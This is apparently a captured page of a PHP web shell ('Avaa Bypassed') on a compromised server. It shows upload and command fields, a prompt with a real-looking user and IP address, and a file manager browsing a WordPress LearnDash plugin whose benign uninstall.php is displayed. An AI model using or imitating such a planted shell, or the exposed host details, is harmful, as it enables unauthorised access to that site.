[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.133.156.254: ~ $
<?php
/**
 * Functions for uninstall LearnDash LMS - Integrity
 *
 * @since 1.2.1
 *
 * @package LearnDash\Integrity
 */

if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
	die;
}

require_once plugin_dir_path( __FILE__ ) . 'vendor-prefixed/autoload.php';

/**
 * Fires on plugin uninstall.
 *
 * @since 1.2.1
 *
 * @return void
 */
do_action( 'learndash_integrity_uninstall' );

Filemanager

Name Type Size Permission Actions
assets Folder 0755
includes Folder 0755
languages Folder 0755
src Folder 0755
vendor Folder 0755
vendor-prefixed Folder 0755
changelog.txt File 989 B 0644
learndash-integrity.php File 4.44 KB 0644
uninstall.php File 373 B 0644